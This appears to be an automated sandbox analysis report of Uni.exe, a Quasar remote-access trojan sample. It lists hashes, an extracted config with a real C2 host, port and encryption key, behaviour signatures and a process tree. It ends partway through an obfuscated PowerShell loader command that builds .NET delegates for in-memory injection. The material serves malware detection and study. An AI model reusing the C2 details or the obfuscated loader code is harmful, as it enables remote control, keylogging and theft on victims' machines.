Analysis
-
max time kernel
1800s -
max time network
1791s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
08-05-2024 17:26
Behavioral task
behavioral1
Sample
Uni.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni.exe
Resource
win7-20240508-en
Behavioral task
behavioral3
Sample
Uni.exe
Resource
win10v2004-20240508-en
General
-
Target
Uni.exe
-
Size
409KB
-
MD5
7417c8c73e614f293152575f46134216
-
SHA1
cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
-
SHA256
00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
-
SHA512
897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
SSDEEP
6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-dOMA5C0pQTTpKjVsCp
-
encryption_key
UBXs44u6E81wxBGZxQHk
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-KEYLOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral3/memory/3952-1-0x00000000006F0000-0x000000000075C000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 964 created 616 964 powershell.EXE winlogon.exe PID 2020 created 616 2020 powershell.EXE winlogon.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
$sxr-powershell.exeinstall.exeinstall.exepid process 3592 $sxr-powershell.exe 2660 install.exe 2944 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 14 raw.githubusercontent.com 15 raw.githubusercontent.com 24 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 ip-api.com -
Drops file in System32 directory 12 IoCs
Processes:
powershell.EXEsvchost.exesvchost.exepowershell.EXEOfficeClickToRun.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 964 set thread context of 3112 964 powershell.EXE dllhost.exe PID 2020 set thread context of 1492 2020 powershell.EXE dllhost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exepid process 3204 schtasks.exe 4488 SCHTASKS.exe 3264 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE -
Modifies registry class 3 IoCs
Processes:
Explorer.EXEsihost.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEpowershell.EXEdllhost.exedllhost.exe$sxr-powershell.exepid process 964 powershell.EXE 964 powershell.EXE 2020 powershell.EXE 2020 powershell.EXE 964 powershell.EXE 3112 dllhost.exe 3112 dllhost.exe 2020 powershell.EXE 3112 dllhost.exe 3112 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 3592 $sxr-powershell.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 3592 $sxr-powershell.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 3592 $sxr-powershell.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe 1492 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Uni.exe$sxr-powershell.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 3952 Uni.exe Token: SeDebugPrivilege 3592 $sxr-powershell.exe Token: SeDebugPrivilege 964 powershell.EXE Token: SeDebugPrivilege 2020 powershell.EXE Token: SeDebugPrivilege 964 powershell.EXE Token: SeDebugPrivilege 3112 dllhost.exe Token: SeDebugPrivilege 2020 powershell.EXE Token: SeDebugPrivilege 1492 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 1700 svchost.exe Token: SeIncreaseQuotaPrivilege 1700 svchost.exe Token: SeSecurityPrivilege 1700 svchost.exe Token: SeTakeOwnershipPrivilege 1700 svchost.exe Token: SeLoadDriverPrivilege 1700 svchost.exe Token: SeSystemtimePrivilege 1700 svchost.exe Token: SeBackupPrivilege 1700 svchost.exe Token: SeRestorePrivilege 1700 svchost.exe Token: SeShutdownPrivilege 1700 svchost.exe Token: SeSystemEnvironmentPrivilege 1700 svchost.exe Token: SeUndockPrivilege 1700 svchost.exe Token: SeManageVolumePrivilege 1700 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1700 svchost.exe Token: SeIncreaseQuotaPrivilege 1700 svchost.exe Token: SeSecurityPrivilege 1700 svchost.exe Token: SeTakeOwnershipPrivilege 1700 svchost.exe Token: SeLoadDriverPrivilege 1700 svchost.exe Token: SeSystemtimePrivilege 1700 svchost.exe Token: SeBackupPrivilege 1700 svchost.exe Token: SeRestorePrivilege 1700 svchost.exe Token: SeShutdownPrivilege 1700 svchost.exe Token: SeSystemEnvironmentPrivilege 1700 svchost.exe Token: SeUndockPrivilege 1700 svchost.exe Token: SeManageVolumePrivilege 1700 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1700 svchost.exe Token: SeIncreaseQuotaPrivilege 1700 svchost.exe Token: SeSecurityPrivilege 1700 svchost.exe Token: SeTakeOwnershipPrivilege 1700 svchost.exe Token: SeLoadDriverPrivilege 1700 svchost.exe Token: SeSystemtimePrivilege 1700 svchost.exe Token: SeBackupPrivilege 1700 svchost.exe Token: SeRestorePrivilege 1700 svchost.exe Token: SeShutdownPrivilege 1700 svchost.exe Token: SeSystemEnvironmentPrivilege 1700 svchost.exe Token: SeUndockPrivilege 1700 svchost.exe Token: SeManageVolumePrivilege 1700 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1700 svchost.exe Token: SeIncreaseQuotaPrivilege 1700 svchost.exe Token: SeSecurityPrivilege 1700 svchost.exe Token: SeTakeOwnershipPrivilege 1700 svchost.exe Token: SeLoadDriverPrivilege 1700 svchost.exe Token: SeSystemtimePrivilege 1700 svchost.exe Token: SeBackupPrivilege 1700 svchost.exe Token: SeRestorePrivilege 1700 svchost.exe Token: SeShutdownPrivilege 1700 svchost.exe Token: SeSystemEnvironmentPrivilege 1700 svchost.exe Token: SeUndockPrivilege 1700 svchost.exe Token: SeManageVolumePrivilege 1700 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1700 svchost.exe Token: SeIncreaseQuotaPrivilege 1700 svchost.exe Token: SeSecurityPrivilege 1700 svchost.exe Token: SeTakeOwnershipPrivilege 1700 svchost.exe Token: SeLoadDriverPrivilege 1700 svchost.exe Token: SeSystemtimePrivilege 1700 svchost.exe Token: SeBackupPrivilege 1700 svchost.exe Token: SeRestorePrivilege 1700 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$sxr-powershell.exepid process 3592 $sxr-powershell.exe -
Suspicious use of UnmapMainImage 2 IoCs
Processes:
RuntimeBroker.exeExplorer.EXEpid process 4044 RuntimeBroker.exe 3520 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Uni.exe$sxr-powershell.exepowershell.EXEpowershell.EXEdllhost.exedescription pid process target process PID 3952 wrote to memory of 3204 3952 Uni.exe schtasks.exe PID 3952 wrote to memory of 3204 3952 Uni.exe schtasks.exe PID 3952 wrote to memory of 3204 3952 Uni.exe schtasks.exe PID 3952 wrote to memory of 3592 3952 Uni.exe $sxr-powershell.exe PID 3952 wrote to memory of 3592 3952 Uni.exe $sxr-powershell.exe PID 3952 wrote to memory of 3592 3952 Uni.exe $sxr-powershell.exe PID 3952 wrote to memory of 2660 3952 Uni.exe install.exe PID 3952 wrote to memory of 2660 3952 Uni.exe install.exe PID 3952 wrote to memory of 2660 3952 Uni.exe install.exe PID 3952 wrote to memory of 4488 3952 Uni.exe SCHTASKS.exe PID 3952 wrote to memory of 4488 3952 Uni.exe SCHTASKS.exe PID 3952 wrote to memory of 4488 3952 Uni.exe SCHTASKS.exe PID 3592 wrote to memory of 3264 3592 $sxr-powershell.exe schtasks.exe PID 3592 wrote to memory of 3264 3592 $sxr-powershell.exe schtasks.exe PID 3592 wrote to memory of 3264 3592 $sxr-powershell.exe schtasks.exe PID 3592 wrote to memory of 2944 3592 $sxr-powershell.exe install.exe PID 3592 wrote to memory of 2944 3592 $sxr-powershell.exe install.exe PID 3592 wrote to memory of 2944 3592 $sxr-powershell.exe install.exe PID 964 wrote to memory of 3112 964 powershell.EXE dllhost.exe PID 964 wrote to memory of 3112 964 powershell.EXE dllhost.exe PID 964 wrote to memory of 3112 964 powershell.EXE dllhost.exe PID 964 wrote to memory of 3112 964 powershell.EXE dllhost.exe PID 964 wrote to memory of 3112 964 powershell.EXE dllhost.exe PID 964 wrote to memory of 3112 964 powershell.EXE dllhost.exe PID 964 wrote to memory of 3112 964 powershell.EXE dllhost.exe PID 964 wrote to memory of 3112 964 powershell.EXE dllhost.exe PID 2020 wrote to memory of 1492 2020 powershell.EXE dllhost.exe PID 2020 wrote to memory of 1492 2020 powershell.EXE dllhost.exe PID 2020 wrote to memory of 1492 2020 powershell.EXE dllhost.exe PID 2020 wrote to memory of 1492 2020 powershell.EXE dllhost.exe PID 2020 wrote to memory of 1492 2020 powershell.EXE dllhost.exe PID 2020 wrote to memory of 1492 2020 powershell.EXE dllhost.exe PID 2020 wrote to memory of 1492 2020 powershell.EXE dllhost.exe PID 2020 wrote to memory of 1492 2020 powershell.EXE dllhost.exe PID 3112 wrote to memory of 616 3112 dllhost.exe winlogon.exe PID 3112 wrote to memory of 668 3112 dllhost.exe lsass.exe PID 3112 wrote to memory of 956 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1020 3112 dllhost.exe dwm.exe PID 3112 wrote to memory of 756 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1044 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1136 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1144 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1152 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1200 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1212 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1320 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1356 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1408 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1420 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1592 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1604 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1616 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1732 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1740 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1780 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1864 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1992 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 2000 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1512 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1600 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 1700 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 2160 3112 dllhost.exe spoolsv.exe PID 3112 wrote to memory of 2264 3112 dllhost.exe svchost.exe PID 3112 wrote to memory of 2368 3112 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1020
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{715e1aca-8a62-4869-ae93-83ac95fe506d}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3112
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{eeff4e80-99ab-44af-a0bf-9101c0409659}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1136
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:BINKnIHxwiey{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UegCyXwrYbZAli,[Parameter(Position=1)][Type]$dtrYrxtQQz)$JKXiSmotQTF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+'l'+'ec'+[Char](116)+''+[Char](101)+'dD'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+'m'+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+[Char](101)+''+[Char](108)+''+'e'+'ga'+[Char](116)+''+[Char](101)+'Ty'+'p'+''+'e'+'',''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+'s,'+[Char](80)+'ubl'+'i'+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+','+''+'A'+'utoC'+'l'+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$JKXiSmotQTF.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+'l'+'N'+'am'+'e'+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$UegCyXwrYbZAli).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+'M'+[Char](97)+'n'+'a'+'g'+[Char](101)+''+[Char](100)+'');$JKXiSmotQTF.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+[Char](111)+''+'k'+''+[Char](101)+'',''+'P'+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+''+[Char](44)+''+'N'+''+'e'+'wS'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$dtrYrxtQQz,$UegCyXwrYbZAli).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $JKXiSmotQTF.CreateType();}$raAYPElaBkkuD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+''+'e'+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+'n3'+'2'+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+'af'+'e'+''+'N'+''+'a'+''+[Char](116)+'i'+'v'+''+'e'+''+[Char](77)+''+'e'+''+'t'+'h'+[Char](111)+'d'+[Char](115)+'');$lVEDeSlznqfxmD=$raAYPElaBkkuD.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+'d'+''+[Char](114)+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'blic,'+[Char](83)+'t'+'a'+'tic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MvfMsTwrefgYjLyWoYV=BINKnIHxwiey @([String])([IntPtr]);$HwZQnwlxZCtiHFXAfjhpBV=BINKnIHxwiey 